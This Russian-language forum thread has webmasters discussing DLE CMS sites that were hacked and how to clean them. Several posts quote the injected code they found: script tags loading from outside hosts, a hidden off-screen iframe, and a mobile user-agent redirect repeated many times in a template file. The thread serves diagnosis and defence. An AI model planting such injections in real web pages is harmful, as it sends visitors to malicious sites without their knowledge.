Вирус на сайте cms dle

эт не ерунда, согласись что в "бесплатных" и "нуллед" версиях изначально шеллы могут лежать незаметненько, ни кто ж не проверяет...

Если скачивать нуллы на проверенных ресурсах, проблем будет не больше, чем с лицензией. Ну а левые ссылки в паблик-шаблонах, уже не редкость и не смертельно. Ну и от хостера тоже может зависеть.

Позавчера тоже взломали два сайта на DLE, которые были на одном хостинге. Сначала в админке у одного высветилось предупреждение, мол отсутствует файл .htacces в папке uploads, хотя он был в папке. Ну я недавно делал бэкап, поэтому заменил этот файл, и сменил пасс от фтп. А в полночь уже при переходе на мои сайты браузер начал ругаться, мол вредоносные сайты. Посмотрел - в начале гнездилась такая строчка:

<script async="async" type="text/javascript" src="http://yakire.co.uv/forum.php"></script>

Начал шерстить все файлы движка на предмет вредоносного кода, смотрел примеры в гугле, но ничего не нашел. Скачал бэкап базы, и там нашел эту ссылку. Почистил, залил на хостинг. На полдня код пропал. Сегодня утром захожу - гнездится уже такая гадость:

<div id="modal_wn" style="top: -1280px; width: 340; height: 480; position: absolute; overflow:auto; left: expression(-450*43); z-index: 540; background-color:#ff0000;"><iframe name="ajaxloadbox" align="absmiddle" src ="http://jkte4.artgauther.biz/9bC6Wf_d6b0f6c0-3cf1_0I948A729_00_15_3f4-1eW.html" title="AjaxShowSlideMenu"width="115" height="390" hspace="11" vspace="9"></iframe></div>

Сегодня буду менять файлы движка на оригинальные, посмотрим, что будет.

У меня то же точно такая зараза почти на всех сайтах. Только гугл показывает - Этот сайт может нанести вред вашему компьютеру. В базе данных не нашел не знаю куда копать.

Как вариант попробуйте сменить хостинг.

И залейте туда чистый движок.

Файлы лучше заливать под права пользователя, по фтп.

Не используйте рута и SSH.

Права на htaccess 444

У меня ломают постоянно на одном Хостинге, на другом нормально.

На одном сайте установили прямо в шаблон main.tpl вот такую заразу

<script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script><script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

  window.location = "http://webtds1.ru/go.php?sid=1";

}

//-->

</script>

Кому это надо сайт обычный ГС новый да еще не индексирован. Смотрю список неудачных попыток авторизации этот взломщик несколько раз подбирал пароли. Все таки подобрал гад не знаю как.

Сегодня на одном сайте нашел в исходном коде скрипт

<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;5"></script>

В файле Index.php

есть строка

$tpl->set ( '{headers}', $metatags."\n".build_js($js_array, $config) );

Я поглядел в другом движке там строка такая

$tpl->set ( '{headers}', $metatags."\n".$js_array );

Незнаю что это за фигня но впервые такое вижу.

seosniks, для dle 9.5 и более ранних это нормальная строка.

Шелл ведет себя очень интересно - код появляется где-то посередине ночи и пропадает к 14-15 часам дня. И все равно никак не могу найти, где он гнездится, перерыл абсолютно все, искал во всех файлах скрипты, функции кодирования в бэйс64, редиректы мобильных устройств - ничего.

Неделю назад Яндекс прислал письмо о заражении, обнаружил в index.php код рода

<script type="text/javascript" src="http://a.domen.co.vu/index.php"></script>

Сегодня он опять появился. Права доступа к index минимальные.